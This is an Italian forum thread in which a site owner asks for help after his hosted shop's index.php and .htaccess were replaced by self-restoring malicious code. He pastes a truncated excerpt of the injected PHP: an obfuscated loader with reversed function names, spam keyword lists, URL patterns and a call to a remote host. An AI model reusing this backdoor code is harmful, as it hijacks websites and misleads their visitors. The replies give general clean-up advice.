[Dominio] File con permessi 444 e codice malevolo

[exFelino]

Buongiorno a tutti,
ho un dominio su Aruba, nel ho pubblicato:
- un ecommerce nella directory /shop
- un file index.php nella root che al momento fa un redirect alla cartella /shop

Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.

Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
Stesso identico problema ce l'ho con il file .htaccess

Qualche suggerimento?

Qui una parte del contenuto:

codice:

<?php @'$
yumingid=47
lineid=2332
x3=index.php/
x4=ghpyxlOwbV
x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite
x6=
x7=http://jnice01.ouuwtizhy573nskt/weilai0.php
cache=0000
sps=111111000
urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html
';$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6)
.....

[Angarat]

Ciao,

se il sito è stato realizzato con wp il problema è quasi sicuramente un plugin oppure proprio il tema.

ad un amico era successa una cosa simile dovuta al fatto che il tema faceva una chiamata ad un server esterno.

[exFelino]

Capito, posso fare qualche controllo in qualche modo?
Oltre verificare la data di modifica dei file?

Grazie.

[Angarat]

partendo dal presupposto che non sono uno specialista wp, fossi in te controllerei se è tutto aggiornato, se i vari plugin sono stati sviluppati da fonti conosciute, se il tema utilizzato è stato reperito dai canali ufficiali.

per quel che ne so, molto poco, il principale problema di solito è un plugin per upload/download, in alternativa controlleri se nel codice del tema vengono fatte chiamate esterne, ma qui siamo in off e non si può parlare tecnicamente.

Poi ovvio il db potrebbe essere compromesso ormai.

la soluzione migliore secondo me è cancellare tutto e rifare con un cms fatto su misura.

[rebelia]

Buongiorno a tutti...

ma mi prendi per i fondelli!?
sei stato bannato per aver postato piu' volte thread tecnici qui, persisti!?